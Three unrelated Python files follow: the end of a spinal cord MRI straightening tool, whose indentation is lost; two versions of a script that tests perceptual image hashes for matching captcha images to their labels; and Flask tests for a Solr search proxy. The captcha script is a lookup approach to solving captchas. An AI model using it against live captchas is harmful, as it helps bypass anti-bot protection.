if iz in iz_curved:
index = iz_curved.index(iz)
# set coordinates for landmark at the center of the cross
landmark_straight.append(Coordinate([x0, y0, iz_straight[index], landmark_curved_value]))
# set x, y and z coordinates for landmarks +x
landmark_straight.append(Coordinate([x0 + gapxy, y0, iz_straight[index], landmark_curved_value+1]))
# set x, y and z coordinates for landmarks -x
landmark_straight.append(Coordinate([x0 - gapxy, y0, iz_straight[index], landmark_curved_value+2]))
# set x, y and z coordinates for landmarks +y
landmark_straight.append(Coordinate([x0, y0 + gapxy, iz_straight[index], landmark_curved_value+3]))
# set x, y and z coordinates for landmarks -y
landmark_straight.append(Coordinate([x0, y0 - gapxy, iz_straight[index], landmark_curved_value+4]))
landmark_curved_value += 5
else:
if self.all_labels >= 1:
landmark_straight.append(Coordinate([x0, y0, iz, landmark_curved_value]))
landmark_curved_value += 1
# Create NIFTI volumes with landmarks
#==========================================================================================
# Pad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV
# N.B. IT IS VERY IMPORTANT TO PAD ALSO ALONG X and Y, OTHERWISE SOME LANDMARKS MIGHT GET OUT OF THE FOV!!!
#sct.run('fslview ' + fname_centerline_orient)
sct.printv('\nPad input volume to account for landmarks that fall outside the FOV...', verbose)
sct.run('isct_c3d '+fname_centerline_orient+' -pad '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox 0 -o tmp.centerline_pad.nii.gz', verbose)
# Open padded centerline for reading
sct.printv('\nOpen padded centerline for reading...', verbose)
file = load('tmp.centerline_pad.nii.gz')
data = file.get_data()
hdr = file.get_header()
landmark_curved_rigid = []
if self.algo_landmark_rigid is not None and self.algo_landmark_rigid != 'None':
# Reorganize landmarks
points_fixed, points_moving = [], []
for coord in landmark_straight:
points_fixed.append([coord.x, coord.y, coord.z])
for coord in landmark_curved:
points_moving.append([coord.x, coord.y, coord.z])
# Register curved landmarks on straight landmarks based on python implementation
sct.printv('\nComputing rigid transformation (algo='+self.algo_landmark_rigid+') ...', verbose)
import msct_register_landmarks
(rotation_matrix, translation_array, points_moving_reg) = msct_register_landmarks.getRigidTransformFromLandmarks(
points_fixed, points_moving, constraints=self.algo_landmark_rigid, show=False)
# reorganize registered pointsx
for index_curved, ind in enumerate(range(0, len(points_moving_reg), 1)):
coord = Coordinate()
coord.x, coord.y, coord.z, coord.value = points_moving_reg[ind][0], points_moving_reg[ind][1], points_moving_reg[ind][2], index_curved+1
landmark_curved_rigid.append(coord)
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_curved_rigid_landmarks = data * 0
data_straight_landmarks = data * 0
# Loop across cross index
for index in range(0, len(landmark_curved_rigid)):
x, y, z = int(round(landmark_curved[index].x)), \
int(round(landmark_curved[index].y)), \
int(round(landmark_curved[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved[index].value
# get x, y and z coordinates of curved landmark (rounded to closest integer)
x, y, z = int(round(landmark_curved_rigid[index].x)), \
int(round(landmark_curved_rigid[index].y)), \
int(round(landmark_curved_rigid[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_rigid_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved_rigid[index].value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index].x)), \
int(round(landmark_straight[index].y)), \
int(round(landmark_straight[index].z))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_straight[index].value
# Write NIFTI volumes
sct.printv('\nWrite NIFTI volumes...', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved.nii.gz', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_rigid_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved_rigid.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved_rigid.nii.gz', verbose)
img = Nifti1Image(data_straight_landmarks, None, hdr)
save(img, 'tmp.landmarks_straight.nii.gz')
sct.printv('.. File created: tmp.landmarks_straight.nii.gz', verbose)
# writing rigid transformation file
text_file = open("tmp.curve2straight_rigid.txt", "w")
text_file.write("#Insight Transform File V1.0\n")
text_file.write("#Transform 0\n")
text_file.write("Transform: AffineTransform_double_3_3\n")
text_file.write("Parameters: %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f\n" % (
rotation_matrix[0, 0], rotation_matrix[0, 1], rotation_matrix[0, 2], rotation_matrix[1, 0],
rotation_matrix[1, 1], rotation_matrix[1, 2], rotation_matrix[2, 0], rotation_matrix[2, 1],
rotation_matrix[2, 2], -translation_array[0, 0], translation_array[0, 1],
-translation_array[0, 2]))
text_file.write("FixedParameters: 0 0 0\n")
text_file.close()
else:
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_straight_landmarks = data * 0
# Loop across cross index
for index in range(0, len(landmark_curved)):
x, y, z = int(round(landmark_curved[index].x)), \
int(round(landmark_curved[index].y)), \
int(round(landmark_curved[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved[index].value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index].x)), \
int(round(landmark_straight[index].y)), \
int(round(landmark_straight[index].z))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_straight[index].value
# Write NIFTI volumes
sct.printv('\nWrite NIFTI volumes...', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved.nii.gz', verbose)
img = Nifti1Image(data_straight_landmarks, None, hdr)
save(img, 'tmp.landmarks_straight.nii.gz')
sct.printv('.. File created: tmp.landmarks_straight.nii.gz', verbose)
# Estimate deformation field by pairing landmarks
#==========================================================================================
# convert landmarks to INT
sct.printv('\nConvert landmarks to INT...', verbose)
sct.run('isct_c3d tmp.landmarks_straight.nii.gz -type int -o tmp.landmarks_straight.nii.gz', verbose)
sct.run('isct_c3d tmp.landmarks_curved.nii.gz -type int -o tmp.landmarks_curved.nii.gz', verbose)
# This stands to avoid overlapping between landmarks
# TODO: do symmetric removal
sct.printv('\nMake sure all labels between landmark_straight and landmark_curved match 1...', verbose)
label_process_straight = ProcessLabels(fname_label="tmp.landmarks_straight.nii.gz",
fname_output=["tmp.landmarks_straight.nii.gz", "tmp.landmarks_curved.nii.gz"],
fname_ref="tmp.landmarks_curved.nii.gz", verbose=verbose)
label_process_straight.process('remove-symm')
# Estimate rigid transformation
sct.printv('\nEstimate rigid transformation between paired landmarks...', verbose)
sct.run('isct_ANTSUseLandmarkImagesToGetAffineTransform tmp.landmarks_straight.nii.gz tmp.landmarks_curved.nii.gz rigid tmp.curve2straight_rigid.txt', verbose)
# Apply rigid transformation
sct.printv('\nApply rigid transformation to curved landmarks...', verbose)
#sct.run('sct_apply_transfo -i tmp.landmarks_curved.nii.gz -o tmp.landmarks_curved_rigid.nii.gz -d tmp.landmarks_straight.nii.gz -w tmp.curve2straight_rigid.txt -x nn', verbose)
Transform(input_filename="tmp.landmarks_curved.nii.gz", source_reg="tmp.landmarks_curved_rigid.nii.gz", output_filename="tmp.landmarks_straight.nii.gz", warp="tmp.curve2straight_rigid.txt", interp="nn", verbose=verbose).apply()
if verbose == 2:
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(x_centerline_fit, y_centerline_fit, z_centerline, zdir='z')
ax.plot([coord.x for coord in landmark_curved],
[coord.y for coord in landmark_curved],
[coord.z for coord in landmark_curved], '.')
ax.plot([coord.x for coord in landmark_straight],
[coord.y for coord in landmark_straight],
[coord.z for coord in landmark_straight], 'r.')
if self.algo_landmark_rigid is not None and self.algo_landmark_rigid != 'None':
ax.plot([coord.x for coord in landmark_curved_rigid],
[coord.y for coord in landmark_curved_rigid],
[coord.z for coord in landmark_curved_rigid], 'b.')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.show()
if (self.use_continuous_labels == 1 and self.algo_landmark_rigid is not None and self.algo_landmark_rigid != "None") or self.use_continuous_labels=='1':
landmark_curved_rigid, landmark_straight = ProcessLabels.remove_label_coord(landmark_curved_rigid, landmark_straight, symmetry=True)
# Writting landmark curve in text file
landmark_straight_file = open("LandmarksRealStraight.txt", "w+")
for i in landmark_straight:
landmark_straight_file.write(
str(i.x + padding) + "," + str(i.y + padding) + "," + str(i.z + padding) + "\n")
landmark_straight_file.close()
# Writting landmark curve in text file
landmark_curved_file = open("LandmarksRealCurve.txt", "w+")
for i in landmark_curved_rigid:
landmark_curved_file.write(
str(i.x + padding) + "," + str(i.y + padding) + "," + str(i.z + padding) + "\n")
landmark_curved_file.close()
# Estimate b-spline transformation curve --> straight
sct.printv('\nEstimate b-spline transformation: curve --> straight...', verbose)
sct.run('isct_ANTSUseLandmarkImagesWithTextFileToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' LandmarksRealCurve.txt LandmarksRealStraight.txt '+self.bspline_order+' 0', verbose)
else:
# This stands to avoid overlapping between landmarks
sct.printv('\nMake sure all labels between landmark_straight and landmark_curved match 2...', verbose)
label_process = ProcessLabels(fname_label="tmp.landmarks_curved_rigid.nii.gz",
fname_output=["tmp.landmarks_curved_rigid.nii.gz", "tmp.landmarks_straight.nii.gz"],
fname_ref="tmp.landmarks_straight.nii.gz", verbose=verbose)
label_process.process('remove-symm')
# Estimate b-spline transformation curve --> straight
sct.printv('\nEstimate b-spline transformation: curve --> straight...', verbose)
sct.run('isct_ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' '+self.bspline_order+' 0', verbose)
# remove padding for straight labels
if crop == 1:
ImageCropper(input_file="tmp.landmarks_straight.nii.gz", output_file="tmp.landmarks_straight_crop.nii.gz", dim="0,1,2", bmax=True, verbose=verbose).crop()
pass
else:
sct.run('cp tmp.landmarks_straight.nii.gz tmp.landmarks_straight_crop.nii.gz', verbose)
# Concatenate rigid and non-linear transformations...
sct.printv('\nConcatenate rigid and non-linear transformations...', verbose)
#sct.run('isct_ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# !!! DO NOT USE sct.run HERE BECAUSE isct_ComposeMultiTransform OUTPUTS A NON-NULL STATUS !!!
cmd = 'isct_ComposeMultiTransform 3 tmp.curve2straight.nii.gz -R tmp.landmarks_straight_crop.nii.gz tmp.warp_curve2straight.nii.gz tmp.curve2straight_rigid.txt'
sct.printv(cmd, verbose, 'code')
sct.run(cmd, self.verbose)
#commands.getstatusoutput(cmd)
# Estimate b-spline transformation straight --> curve
# TODO: invert warping field instead of estimating a new one
sct.printv('\nEstimate b-spline transformation: straight --> curve...', verbose)
if (self.use_continuous_labels==1 and self.algo_landmark_rigid is not None and self.algo_landmark_rigid != "None") or self.use_continuous_labels=='1':
sct.run('isct_ANTSUseLandmarkImagesWithTextFileToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' LandmarksRealCurve.txt LandmarksRealStraight.txt '+self.bspline_order+' 0', verbose)
else:
sct.run('isct_ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' '+self.bspline_order+' 0', verbose)
# Concatenate rigid and non-linear transformations...
sct.printv('\nConcatenate rigid and non-linear transformations...', verbose)
cmd = 'isct_ComposeMultiTransform 3 tmp.straight2curve.nii.gz -R '+file_anat+ext_anat+' -i tmp.curve2straight_rigid.txt tmp.warp_straight2curve.nii.gz'
sct.printv(cmd, verbose, 'code')
#commands.getstatusoutput(cmd)
sct.run(cmd, self.verbose)
# Apply transformation to input image
sct.printv('\nApply transformation to input image...', verbose)
Transform(input_filename=str(file_anat+ext_anat), source_reg="tmp.anat_rigid_warp.nii.gz", output_filename="tmp.landmarks_straight_crop.nii.gz", interp=interpolation_warp, warp="tmp.curve2straight.nii.gz", verbose=verbose).apply()
# compute the error between the straightened centerline/segmentation and the central vertical line.
# Ideally, the error should be zero.
# Apply deformation to input image
sct.printv('\nApply transformation to centerline image...', verbose)
# sct.run('sct_apply_transfo -i '+fname_centerline_orient+' -o tmp.centerline_straight.nii.gz -d tmp.landmarks_straight_crop.nii.gz -x nn -w tmp.curve2straight.nii.gz')
Transform(input_filename=fname_centerline_orient, source_reg="tmp.centerline_straight.nii.gz", output_filename="tmp.landmarks_straight_crop.nii.gz", interp="nn", warp="tmp.curve2straight.nii.gz", verbose=verbose).apply()
#c = sct.run('sct_crop_image -i tmp.centerline_straight.nii.gz -o tmp.centerline_straight_crop.nii.gz -dim 2 -bzmax')
from msct_image import Image
file_centerline_straight = Image('tmp.centerline_straight.nii.gz', verbose=verbose)
coordinates_centerline = file_centerline_straight.getNonZeroCoordinates(sorting='z')
mean_coord = []
from numpy import mean
for z in range(coordinates_centerline[0].z, coordinates_centerline[-1].z):
temp_mean = [coord.value for coord in coordinates_centerline if coord.z == z]
if temp_mean:
mean_value = mean(temp_mean)
mean_coord.append(mean([[coord.x * coord.value / mean_value, coord.y * coord.value / mean_value] for coord in coordinates_centerline if coord.z == z], axis=0))
# compute error between the input data and the nurbs
from math import sqrt
x0 = file_centerline_straight.data.shape[0]/2.0
y0 = file_centerline_straight.data.shape[1]/2.0
count_mean = 0
for coord_z in mean_coord:
if not isnan(sum(coord_z)):
dist = ((x0-coord_z[0])*px)**2 + ((y0-coord_z[1])*py)**2
self.mse_straightening += dist
dist = sqrt(dist)
if dist > self.max_distance_straightening:
self.max_distance_straightening = dist
count_mean += 1
self.mse_straightening = sqrt(self.mse_straightening/float(count_mean))
except Exception as e:
sct.printv('WARNING: Exception during Straightening:', 1, 'warning')
print 'Error on line {}'.format(sys.exc_info()[-1].tb_lineno)
print e
os.chdir('..')
# Generate output file (in current folder)
# TODO: do not uncompress the warping field, it is too time consuming!
sct.printv('\nGenerate output file (in current folder)...', verbose)
sct.generate_output_file(path_tmp+'/tmp.curve2straight.nii.gz', 'warp_curve2straight.nii.gz', verbose) # warping field
sct.generate_output_file(path_tmp+'/tmp.straight2curve.nii.gz', 'warp_straight2curve.nii.gz', verbose) # warping field
if fname_output == '':
fname_straight = sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz', file_anat+'_straight'+ext_anat, verbose) # straightened anatomic
else:
fname_straight = sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz', fname_output, verbose) # straightened anatomic
# Remove temporary files
if remove_temp_files:
sct.printv('\nRemove temporary files...', verbose)
sct.run('rm -rf '+path_tmp, verbose)
sct.printv('\nDone!\n', verbose)
sct.printv('Maximum x-y error = '+str(round(self.max_distance_straightening,2))+' mm', verbose, 'bold')
sct.printv('Accuracy of straightening (MSE) = '+str(round(self.mse_straightening,2))+' mm', verbose, 'bold')
# display elapsed time
elapsed_time = time.time() - start_time
sct.printv('\nFinished! Elapsed time: '+str(int(round(elapsed_time)))+'s', verbose)
sct.printv('\nTo view results, type:', verbose)
sct.printv('fslview '+fname_straight+' &\n', verbose, 'info')
if __name__ == "__main__":
    # Build the command-line interface.
    parser = Parser(__file__)
    # Mandatory arguments
    parser.usage.set_description("This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal cord was straightened.")
    parser.add_option(name="-i", type_value="image_nifti",
                      description="input image.",
                      mandatory=True, example="t2.nii.gz")
    parser.add_option(name="-c", type_value="image_nifti",
                      description="centerline or segmentation.",
                      mandatory=True, example="centerline.nii.gz")
    parser.add_option(name="-p", type_value="int",
                      description="amount of padding for generating labels.",
                      mandatory=False, example="30", default_value=30)
    parser.add_option(name="-o", type_value="file_output",
                      description="output file",
                      mandatory=False, default_value='', example="out.nii.gz")
    parser.add_option(name="-x", type_value="multiple_choice",
                      description="Final interpolation.",
                      mandatory=False, example=["nn", "linear", "spline"],
                      default_value="spline")
    parser.add_option(name="-r", type_value="multiple_choice",
                      description="remove temporary files.",
                      mandatory=False, example=['0', '1'], default_value='1')
    parser.add_option(name="-a", type_value="multiple_choice",
                      description="Algorithm for curve fitting.",
                      mandatory=False, example=["hanning", "nurbs"],
                      default_value="hanning")
    parser.add_option(name="-f", type_value="multiple_choice",
                      description="Crop option. 0: no crop, 1: crop around landmarks.",
                      mandatory=False, example=['0', '1'], default_value=1)
    parser.add_option(name="-v", type_value="multiple_choice",
                      description="Verbose. 0: nothing, 1: basic, 2: extended.",
                      mandatory=False, example=['0', '1', '2'], default_value=1)
    parser.add_option(name="-params", type_value=[[','], 'str'],
                      description="""Parameters for spinal cord straightening. Separate arguments with ",".\nuse_continuous_labels : 0,1. Default = False\nalgo_fitting: {hanning,nurbs} algorithm for curve fitting. Default=hanning\nbspline_meshsize: <int>x<int>x<int> size of mesh for B-Spline registration. Default=5x5x10\nbspline_numberOfLevels: <int> number of levels for BSpline interpolation. Default=3\nbspline_order: <int> Order of BSpline for interpolation. Default=2\nalgo_landmark_rigid {rigid,xy,translation,translation-xy,rotation,rotation-xy} constraints on landmark-based rigid pre-registration""",
                      mandatory=False,
                      example="algo_fitting=nurbs,bspline_meshsize=5x5x12,algo_landmark_rigid=xy")
    parser.add_option(name="-cpu-nb", type_value="int",
                      description="Number of CPU used for straightening. 0: no multiprocessing. If not provided, it uses all the available cores.",
                      mandatory=False, example="8")
    arguments = parser.parse(sys.argv[1:])

    # Instantiate the straightener with the two mandatory inputs.
    sc_straight = SpinalCordStraightener(arguments["-i"], arguments["-c"])

    # Optional flags, each mapped to (attribute on sc_straight, converter).
    for flag, attr, conv in (("-r", "remove_temp_files", int),
                             ("-p", "padding", int),
                             ("-x", "interpolation_warp", str),
                             ("-o", "output_filename", str),
                             ("-a", "algo_fitting", str),
                             ("-f", "crop", int),
                             ("-v", "verbose", int),
                             ("-cpu-nb", "cpu_number", int)):
        if flag in arguments:
            setattr(sc_straight, attr, conv(arguments[flag]))

    if "-params" in arguments:
        # Update registration parameters; each entry looks like "key=value".
        # Unrecognised keys are silently ignored.
        converters = {"algo_fitting": str,
                      "bspline_meshsize": str,
                      "bspline_numberOfLevels": str,
                      "bspline_order": str,
                      "algo_landmark_rigid": str,
                      "all_labels": int,
                      "use_continuous_labels": int,
                      "gapz": int}
        for param in arguments['-params']:
            parts = param.split('=')
            if parts[0] in converters:
                setattr(sc_straight, parts[0], converters[parts[0]](parts[1]))

    sc_straight.straighten()
|
# coding: utf-8
import pathlib
import cv2
import numpy as np
import scipy.fftpack
def avhash(im):
    """Average hash: shrink to 8x8, threshold at the mean, pack to 8 bytes."""
    small = cv2.resize(im, (8, 8), interpolation=cv2.INTER_CUBIC)
    bits = small > small.mean()
    return np.packbits(bits)
def phash(im):
    """Perceptual hash: 2-D DCT of a 32x32 image, keep the 8x8 low-frequency
    corner, threshold at the median, pack to 8 bytes."""
    small = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
    freq = scipy.fftpack.dct(scipy.fftpack.dct(small, axis=0), axis=1)
    low = freq[:8, :8]
    return np.packbits(low > np.median(low))
def phash_simple(im):
    """Simplified perceptual hash: single 1-D DCT, keep rows 0-7 and
    columns 1-8, threshold at the mean, pack to 8 bytes."""
    small = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
    freq = scipy.fftpack.dct(small)
    low = freq[:8, 1:8 + 1]
    return np.packbits(low > low.mean())
def dhash(im):
    """Difference hash: shrink to 9x8, compare horizontally adjacent pixels."""
    small = cv2.resize(im, (8 + 1, 8), interpolation=cv2.INTER_CUBIC)
    diff = small[:, 1:] > small[:, :-1]
    return np.packbits(diff)
def dhash_vertical(im):
    """Difference hash (vertical): shrink to 8x9, compare vertically adjacent
    pixels."""
    small = cv2.resize(im, (8, 8 + 1), interpolation=cv2.INTER_CUBIC)
    diff = small[1:, :] > small[:-1, :]
    return np.packbits(diff)
def whash(im):
    """Wavelet hash -- not implemented.

    Original author's note (translated): "It's not that I won't do it --
    I genuinely couldn't follow the reference source code."

    Raise explicitly instead of silently returning None, so any caller
    (e.g. verify(whash)) fails with a clear message rather than a confusing
    AttributeError on None.
    """
    raise NotImplementedError("whash is not implemented")
def verify(_hash):
    """Evaluate a hash function on the labelled captcha validation set.

    Images that map to the same 64-bit hash are expected to carry the same
    label; any collision with a conflicting label dumps both images into
    errors/ for manual inspection.

    @_hash: one of the hash functions above; takes a grayscale image and
    returns 8 packed bytes (64 bits).
    """
    # Use the validation set to test how well each hash function performs.
    data = np.load('captcha.npz')
    images, labels = data['images'], data['labels']
    print(images.shape)
    himages = {}
    for idx, (img, label) in enumerate(zip(images, labels)):
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        img = _hash(img)
        # Reinterpret the 8 packed bytes in place as one uint64 dict key.
        img.dtype = np.uint64
        img = img[0]
        if himages.get(img, (label,))[0] != label:
            # Hash collision with a different label: save both offending
            # images (new and previously seen) for review.
            cv2.imwrite(f'errors/{idx}.{label}.jpg', images[idx])
            pre_label, pre_idx = himages[img]
            cv2.imwrite(f'errors/{idx}.{pre_label}.jpg', images[pre_idx])
        else:
            himages[img] = label, idx
    print(len(himages))
if __name__ == '__main__':
    # Collision images are written into this folder by verify().
    pathlib.Path('errors').mkdir(exist_ok=True)
    # verify(avhash)
    # I think the one below works best
    verify(phash)
    # verify(phash_simple)
    # verify(dhash)
    # verify(dhash_vertical)
whash is actually pretty good
# coding: utf-8
import pathlib
import cv2
import numpy as np
import scipy.fftpack
def avhash(im):
    """Average hash: shrink to 8x8, threshold at the mean, pack to 8 bytes."""
    small = cv2.resize(im, (8, 8), interpolation=cv2.INTER_CUBIC)
    bits = small > small.mean()
    return np.packbits(bits)
def phash(im):
    """Perceptual hash: 2-D DCT of a 32x32 image, keep the 8x8 low-frequency
    corner, threshold at the median, pack to 8 bytes."""
    small = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
    freq = scipy.fftpack.dct(scipy.fftpack.dct(small, axis=0), axis=1)
    low = freq[:8, :8]
    return np.packbits(low > np.median(low))
def phash_simple(im):
    """Simplified perceptual hash: single 1-D DCT, keep rows 0-7 and
    columns 1-8, threshold at the mean, pack to 8 bytes."""
    small = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
    freq = scipy.fftpack.dct(small)
    low = freq[:8, 1:8 + 1]
    return np.packbits(low > low.mean())
def dhash(im):
    """Difference hash: shrink to 9x8, compare horizontally adjacent pixels."""
    small = cv2.resize(im, (8 + 1, 8), interpolation=cv2.INTER_CUBIC)
    diff = small[:, 1:] > small[:, :-1]
    return np.packbits(diff)
def dhash_vertical(im):
    """Difference hash (vertical): shrink to 8x9, compare vertically adjacent
    pixels."""
    small = cv2.resize(im, (8, 8 + 1), interpolation=cv2.INTER_CUBIC)
    diff = small[1:, :] > small[:-1, :]
    return np.packbits(diff)
def whash(image):
    """Wavelet Hash computation.

    based on https://www.kaggle.com/c/avito-duplicate-ads-detection/

    @image: a 2-D grayscale numpy array (it is resized with cv2 and indexed
    via .shape -- NOT a PIL instance, despite the upstream docstring).

    Returns the packed hash bits as a uint8 array.
    """
    # BUG FIX: pywt was referenced but never imported anywhere in this module,
    # so calling whash raised NameError. Import it locally so the module stays
    # importable even when PyWavelets is not installed.
    import pywt
    # Scale down to the largest power-of-two square that fits the image.
    # NOTE(review): assumes min(image.shape) >= 2**(level+1) so that
    # dwt_level >= 1 -- confirm behaviour for very small inputs.
    ll_max_level = int(np.log2(min(image.shape)))
    image_scale = 2**ll_max_level
    level = 3
    dwt_level = ll_max_level - level
    image = cv2.resize(image, (image_scale, image_scale))
    pixels = image / 255
    # Remove low level frequency LL(max_ll) using haar filter
    coeffs = pywt.wavedec2(pixels, 'haar', level=ll_max_level)
    coeffs[0][:] = 0
    pixels = pywt.waverec2(coeffs, 'haar')
    # Use LL(K) as freq, where K is log2(@hash_size)
    coeffs = pywt.wavedec2(pixels, 'haar', level=dwt_level)
    dwt_low = coeffs[0]
    # Subtract median and compute hash
    med = np.median(dwt_low)
    diff = dwt_low > med
    diff = np.packbits(diff)
    return diff
def verify(_hash):
    """Evaluate a hash function on the labelled captcha validation set.

    Images that map to the same 64-bit hash are expected to carry the same
    label; any collision with a conflicting label dumps both images into
    errors/ for manual inspection.

    @_hash: one of the hash functions above; takes a grayscale image and
    returns 8 packed bytes (64 bits).
    """
    # Use the validation set to test how well each hash function performs.
    data = np.load('captcha.npz')
    images, labels = data['images'], data['labels']
    print(images.shape)
    himages = {}
    for idx, (img, label) in enumerate(zip(images, labels)):
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        img = _hash(img)
        # Reinterpret the 8 packed bytes in place as one uint64 dict key.
        img.dtype = np.uint64
        img = img[0]
        if himages.get(img, (label,))[0] != label:
            # Hash collision with a different label: save both offending
            # images (new and previously seen) for review.
            cv2.imwrite(f'errors/{idx}.{label}.jpg', images[idx])
            pre_label, pre_idx = himages[img]
            cv2.imwrite(f'errors/{idx}.{pre_label}.jpg', images[pre_idx])
        else:
            himages[img] = label, idx
    print(len(himages))
if __name__ == '__main__':
    # Collision images are written into this folder by verify().
    pathlib.Path('errors').mkdir(exist_ok=True)
    # verify(avhash)
    # I think the one below works best
    verify(phash)
    # verify(phash_simple)
    # verify(dhash)
    # verify(dhash_vertical)
|
import sys, os
PROJECT_HOME = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../'))
sys.path.append(PROJECT_HOME)
from flask.ext.testing import TestCase
from flask import url_for
import unittest
import httpretty
import json
import app
from werkzeug.security import gen_salt
from werkzeug.datastructures import MultiDict
from StringIO import StringIO
from ..mocks import MockSolrResponse
from views import SolrInterface
class TestSolrInterface(TestCase):
    """Unit tests for the SolrInterface helper."""

    def create_app(self):
        """Start the wsgi application"""
        return app.create_app()

    def test_cleanup_solr_request(self):
        """
        Simple test of the cleanup classmethod
        """
        cleaned = SolrInterface.cleanup_solr_request({'fl': ['*,bibcode,title']})
        # The wildcard must have been stripped from the first 'fl' entry.
        self.assertNotIn('*', cleaned['fl'][0])
class TestWebservices(TestCase):
    """End-to-end tests of the HTTP endpoints (search, qtree, tvrh, bigquery),
    with the backing solr instance faked via httpretty or MockSolrResponse."""
    def create_app(self):
        """Start the wsgi application"""
        _ = app.create_app()
        return _
    @httpretty.activate
    def test_cookie_forwarding(self):
        """
        Test that cookies get properly passed by the SolrInterface
        """
        # Echo back the proxied request's cookie header so the response body
        # reveals exactly what was forwarded to solr.
        def request_callback(request, uri, headers):
            return 200, headers, request.headers.get('cookie')
        httpretty.register_uri(
            httpretty.POST, self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER'),
            body=request_callback,
        )
        with self.client as c:
            cookie_value = gen_salt(200)
            # This cookie should be forwarded
            c.set_cookie(
                'localhost',
                self.app.config.get("SOLR_SERVICE_FORWARD_COOKIE_NAME"),
                cookie_value
            )
            # This cookie should not be forwarded
            c.set_cookie(
                'localhost',
                'cookie_name',
                'cookie_value'
            )
            r = c.get(url_for('search'), query_string={'q': 'star'})
            # One and only one cookie
            self.assertEqual(len(r.data.split('=')), 2)
            # This forwarded cookie should match the one we gave originally
            rcookie_value = r.data.split('=')[1]
            self.assertEqual(rcookie_value, cookie_value)
    def test_disallowed_fields(self):
        """
        disallowed fields should be absent from the solr response
        """
        with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
            # Explicitly ask for the disallowed fields alongside allowed ones.
            fl = 'title,id,abstract,{}'.format(
                ','.join(self.app.config['SOLR_SERVICE_DISALLOWED_FIELDS'])
            )
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'fl': fl},
            )
            for doc in r.json['response']['docs']:
                self.assertIn('title', doc)
                self.assertIn('id', doc)
                self.assertIn('abstract', doc)
                for field in self.app.config['SOLR_SERVICE_DISALLOWED_FIELDS']:
                    self.assertNotIn(field, doc)
    def test_cleanup_params(self):
        """
        Certain parameters have limits
        """
        with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
            # hl.snippets / hl.full.snippets get capped at 4.
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'hl.snippets': 10},
            )
            self.assertEqual(r.json['responseHeader']['params']['hl.snippets'], ['4'])
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'hl.snippets': 14, 'hl.full.snippets': 10},
            )
            self.assertEqual(r.json['responseHeader']['params']['hl.snippets'], ['4'])
